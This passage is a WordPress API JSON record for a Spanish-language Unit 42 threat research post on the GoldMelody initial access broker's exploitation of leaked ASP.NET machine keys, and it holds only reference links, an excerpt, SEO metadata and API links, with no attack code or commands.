href=\"https:\/\/www.secureworks.com\/research\/gold-melody-profile-of-an-initial-access-broker\" target=\"_blank\" rel=\"noopener\">GOLD MELODY: Profile of an Initial Access Broker (Perfil de un intermediario de acceso inicial) |<\/a> Secureworks<\/li>\n<li><a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/unc961-multiverse-financially-motivated\" target=\"_blank\" rel=\"noopener\">UNC961 in the Multiverse of Mandiant: Three Encounters with a Financially Motivated Threat Actor (UNC961 en el multiverso de Mandiant: tres encuentros con un actor de amenazas con motivaci\u00f3n financiera)<\/a><\/li>\n<li><a href=\"https:\/\/portswigger.net\/kb\/issues\/00400600_asp-net-viewstate-without-mac-enabled\" target=\"_blank\" rel=\"noopener\">ASP.NET ViewState without MAC enabled (ViewState en ASP.NET sin MAC activado) - <\/a>PortSwigger<\/li>\n<li><a href=\"https:\/\/www.crowdstrike.com\/en-us\/blog\/falcon-overwatch-detects-iceapple-framework\/\" target=\"_blank\" rel=\"noopener\">Falcon OverWatch Detects Novel IceApple Framework (Falcon OverWatch detecta el nuevo marco IceApple) | <\/a>CrowdStrike<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Una campa\u00f1a de IAB explot\u00f3 claves de m\u00e1quina ASP.NET filtradas. Diseccionamos su infraestructura, su campa\u00f1a y las conclusiones para los equipos azules.<\/p>\n","protected":false},"author":366,"featured_media":145085,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8739,8829],"tags":[9529,9531,9372,9530,9532],"product_categories":[8922,8924,8921,8932,8934,8935,8890],"coauthors":[8472,4188],"class_list":["post-157356","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybercrime-es-la","category-threat-actor-groups-es-la","tag-golang-es-la","tag-initial-access-broker-es-la","tag-microsoft-es-la","tag-web-server-es-la","tag-web-shells-es-la","product_categories-advanced-dns-security-es-la","product_categories-advanced-url-filtering-es-la","product_categories-cloud-delivered-security-services-es-la","product_categories-cortex-es-la","product_categories-cortex-xdr-es-la","product_categories-cortex-xsiam-es-la","product_categories-unit-42-incident-response-es-la"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial<\/title>\n<meta name=\"description\" content=\"Una campa\u00f1a de IAB explot\u00f3 claves de m\u00e1quina ASP.NET filtradas. Diseccionamos su infraestructura, su campa\u00f1a y las conclusiones para los equipos azules.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/\" \/>\n<meta property=\"og:locale\" content=\"es_LA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial\" \/>\n<meta property=\"og:description\" content=\"Una campa\u00f1a de IAB explot\u00f3 claves de m\u00e1quina ASP.NET filtradas. Diseccionamos su infraestructura, su campa\u00f1a y las conclusiones para los equipos azules.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-08T18:15:19+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-15T18:52:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/03_Cybercrime_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Tom Marsden, Chema Garcia\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial","description":"Una campa\u00f1a de IAB explot\u00f3 claves de m\u00e1quina ASP.NET filtradas. Diseccionamos su infraestructura, su campa\u00f1a y las conclusiones para los equipos azules.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/","og_locale":"es_LA","og_type":"article","og_title":"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial","og_description":"Una campa\u00f1a de IAB explot\u00f3 claves de m\u00e1quina ASP.NET filtradas. Diseccionamos su infraestructura, su campa\u00f1a y las conclusiones para los equipos azules.","og_url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/","og_site_name":"Unit 42","article_published_time":"2025-07-08T18:15:19+00:00","article_modified_time":"2025-09-15T18:52:36+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/03_Cybercrime_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Tom Marsden, Chema Garcia","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/"},"author":{"name":"Sheida Azimi","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639"},"headline":"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial","datePublished":"2025-07-08T18:15:19+00:00","dateModified":"2025-09-15T18:52:36+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/"},"wordCount":5141,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/03_Cybercrime_Category_1920x900.jpg","keywords":["GoLang","Initial Access Broker","Microsoft","web server","web shells"],"articleSection":["Ciberdelito","Grupos de actores de amenazas"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/","url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/","name":"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/03_Cybercrime_Category_1920x900.jpg","datePublished":"2025-07-08T18:15:19+00:00","dateModified":"2025-09-15T18:52:36+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639"},"description":"Una campa\u00f1a de IAB explot\u00f3 claves de m\u00e1quina ASP.NET filtradas. Diseccionamos su infraestructura, su campa\u00f1a y las conclusiones para los equipos azules.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/03_Cybercrime_Category_1920x900.jpg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/03_Cybercrime_Category_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of initial access brokers like TGR-CRI-0045. Digital concept image featuring a stream of glowing code with words like \"Security,\" \"Hackers,\" and \"Crime\" overlaid in bold text, symbolizing cybersecurity and data protection."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639","name":"Sheida Azimi","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Sheida Azimi"},"url":"https:\/\/unit42.paloaltonetworks.com\/es-la\/author\/sheida-azimi\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/157356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/users\/366"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/comments?post=157356"}],"version-history":[{"count":1,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/157356\/revisions"}],"predecessor-version":[{"id":157436,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/posts\/157356\/revisions\/157436"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/media\/145085"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/media?parent=157356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/categories?post=157356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/tags?post=157356"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/product_categories?post=157356"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/es-la\/wp-json\/wp\/v2\/coauthors?post=157356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}